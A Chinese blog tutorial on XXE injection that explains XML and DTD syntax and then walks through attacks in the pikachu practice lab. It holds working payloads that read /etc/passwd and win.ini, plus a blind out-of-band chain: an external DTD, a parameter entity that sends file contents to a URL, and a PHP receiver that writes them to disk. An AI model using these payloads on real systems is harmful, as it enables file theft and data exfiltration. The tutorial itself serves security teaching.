XXE

最新推荐文章于 2024-03-30 21:52:31 发布
最新推荐文章于 2024-03-30 21:52:31 发布
阅读量150 收藏
点赞数
分类专栏: web漏洞 文章标签: 安全漏洞 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51822230/article/details/115790760
版权

XXE原理介绍

XXE Injection即XML External Entity Injection。也就是外部实体注入攻击。漏洞是由在处理不安全的外部实体数据时造成的。

在了解xxe漏洞之前我们需要对xml有所了解。

xml

xml与html的区别为:xml是传输和储存数据的。html的作用是显示数据的。

xml的结构是树结构,从根出发再到叶

<?xml version="1.0" encoding="UTF-8"?>			//表达版本和编码方式
<note>											//根元素
<to>Tove</to>									//4个子元素
<from>Jani</from>			
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

xml的自我表达力很强。从标签和定义的元素上就可以看出想要表达什么。

xml语法表达
1.得有xml声明
2.xml文档一定得有根元素
3.必须有闭合标签
4.大小写敏感
5.属性值必须加引号
6.实体引用
在这里插入图片描述
xml元素与属性
元素:XML 元素指的是从(且包括)开始标签直到(且包括)结束标签的部分。 <123>Harry Potter</123>
属性:属性(Attribute)提供有关元素的额外信息。
<123 name=‘George “Shotgun” Ziegler’>
可参考文章:
xml属性
xml元素

DTD声明

<?xml version="1.0"?>
<!DOCTYPE note [					//声明了根元素
<!ELEMENT note (to,from,heading,body)>			//声明子元素
<!ELEMENT to (#PCDATA)>				//下面个子元素都是可以编辑型
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>								//进行匹配文档的书写
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

引用一张图片:XML外部实体注入小结

xxe危害

1.本地敏感文件读取
2.主机探测,端口扫描
3.文件上传
4.命令执行

任意文件读取

在linux中查看passwd

<?xml version="1.0"?>
<!DOCTYPE  a  [<!ENTITY b SYSTEM "file:///etc/passwd">]>
<c>&b;</c>

在windows中查看win.ini

<?xml version="1.0"?>
<!DOCTYPE  a  [<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">]>
<c>&b;</c>

文件读取分为有回显和无回显
1.有回显

<?xml version="1.0"?> 
 <!DOCTYPE a [ <!ENTITY xxe "123" > ]> 
  <a>&xxe;</a>

在这里插入图片描述
直接进行文件读取
在这里插入图片描述

当然这种特殊符号少的就不会进行报错,如果特殊符号多就不会回显。我们就可以使用CDATA,不进行解析。

2.无回显
我们先把靶场的显示函数注释掉。
在这里插入图片描述在这里插入图片描述
现在我们就是一个无回显的环境。

对于我们的blind xxe我们一般思路是使用外带数据通道进行信息读取。首先进行一个信息读取,使用flie://或者php://filte协议。然后将数据发送到我们的攻击机。如果不知道具体路径,就使用php://filte进行在当前目录下读取文件。

我们这里使用环回地址进行测试:127.0.0.1

思路大概就是这样,我们来构造playload

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/1.txt">			
<!ENTITY % remote SYSTEM "http://127.0.0.1/evil.xml">		
%remote;
%all;
]>
<root>&send;</root>

evil.txt内容

<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1/1.php?file=%file;'>">

1.php内容

<?php file_put_contents("2.txt", $_GET['file']); ?>

攻击流程
1.先调用%remote,请求evil.txt文件中的内容
2.再调用evil.txt中的%file,获取本地文件。
3.调用%all,进行send。运行file_put_contents函数,我们会在攻击服务器上创建一个2.txt内容。2.txt里的内容就是1.txt里的内容。

我们以pikachu靶场作为案例

这是我们C盘下的1.txt文件

在这里插入图片描述
输入playload
在这里插入图片描述生成2.txt文件
在这里插入图片描述成功获取内容
在这里插入图片描述

在靶场执行我们的xml内容后,攻击服务器上就会生成2.txt文件

参考文章

1.菜鸟教程
2.XML外部实体注入小结
3.一篇文章带你深入理解漏洞之 XXE 漏洞
4.从XML相关一步一步到XXE漏洞

hsxiaowu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xxe
r_deku的博客
11-19 278
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、xxe漏洞简介二、xxe漏洞利用1.实验一:有回显读本地敏感文件(Normal XXE)2.实验二:无回显读取本地敏感文件(Blind OOB XXE) 前言 认识XXE之前必学认识XML,XML 指可扩展标记语言(Extensible Markup Language) XML是用于 标记电子文件 使其具有 结构性 的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
xxe-lab学习
win176489的博客
03-03 868
xxe-lab学习 xxe:xml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体 环境如下 首先时回显的xxe,测试数据如下 POST /php_xxe/doLogin.php HTTP/1.1 Host: 10.10.6.168 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: application/xml, text/xml, */*; q=0.01 Acc
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2371
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
XXE 从入门到放弃
江南小虫虫的博客
02-13 1593
0x00 前言 如果各位表哥表姐已经懂得啥是 XML, DTD, 那么可以直接从0x02 什么是 XXE?开始看; 如果你只是大概知道啥是 XML , 那么我建议你从头开始看! 0x01 XML 与 DTD XXE漏洞全程为XML External Entity Injection, 也就是XML外部实体注入漏洞。 显然, 这个漏洞和 XML 有关(废话), 那第一步, 先了解什么是XML。 什么...
XXE攻防
LainWith的博客
08-24 637
目录前言什么是XXE脑图什么是XMLXML基本语法文档类型定义(DTD)实体XXE攻击分类检测XXE存在任意文件读取SSRF 攻击执行系统命令探测内网端口Blind XXE漏洞靶机实测Vulnhub搭建任意文件读取获取flag靶机实测XXE-lab防御方式使用开发语言提供的禁用外部实体的方法过滤用户提交的XML数据参考 前言 什么是XXE XXE(XML External Entity Injection)即XML外部实体注入,攻击者通过向服务器注入指定的XML实体内容,从而让服务器按照指定的配置进行执行,
XXE漏洞笔记
qq_32812063的博客
11-26 609
XXE
XXE漏洞
最新发布
2301_80337881的博客
03-30 2028
XML(Extensible Markup Language)是一种类似于HTML,但是没有使用预定义标记的语言。因此,可以根据自己的设计需求定义专属的标记。这是一种强大将数据存储在一个可以存储、搜索和共享的格式中的方法。最重要的是,因为 XML 的基本格式是标准化的,如果你在本地或互联网上跨系统或平台共享或传输 XML,由于标准化的 XML 语法,接收者仍然可以解析数据。举个例子:假设一个微信群里面小明发了一条消息“你吃过没”。
XXE详解
qq_48904485的博客
03-22 5512
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE注入详解】 XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,...
XXE payload
黑面狐
08-16 7593
一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz即可 三、XXE payload 网上收集的payload -------------...
业务逻辑漏洞之水平越权和垂直越权
m0_51822230的博客
04-23 6885
越权漏洞原理 浏览器对用户提交的数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能。 越权漏洞被分为两类 一类是水平越权,一类是垂直越权。 水平越权 :用户在权限相同级别下的组,可以进行越权访问、修改、删除数据。 垂直越权 :用户在不同权限下的组,可以进行高级别的权限使用。 漏洞成因 前端原因: 只对页面进行更高权限的隐藏 实际上并没有对后端的进行一个权限过滤,只是对前端进行隐藏。根据用户权限的判断,进行选择显示,但是功能点还是可以触发。 正确的做法应该是用户权限与功能点进行绑定。
sqlmap提权
m0_51822230的博客
05-17 4345
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
命令执行及代码执行
m0_51822230的博客
04-20 1433
命令执行及代码执行漏洞原理 命令执行和代码执行漏洞是因为在代码中有进行执行的函数,但是有没有对用户可控数据进行过滤,所以形成了这个漏洞。 命令执行常见函数。 system:执行一个外部的应用程序并显示输出的结果。 exec:执行一个外部的应用程序。 shell_exec:执行shell命令并返回输出的结果的字符串。 passthru:执行一个UNIX系统命令并显示原始的输出。 popen():打开到命令参数中指定的程序的管道,如果发生错误,则返回false。 proc_open: 执行一个命令,并且打开用
修改secure_file_priv的值后,仍然没有生效。
m0_51822230的博客
02-15 1365
我的之前的问题是使用phpstudy后,它在自己的安装目录下生成了一个my.ini(在安装phpstuay前系统里就存在mysql)。改了这个文件以后仍然没有生效,后来才发现是要在原mysql路径下修改my.ini才可以成功。 希望能对使用phpstudy的用户产生一点帮助。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值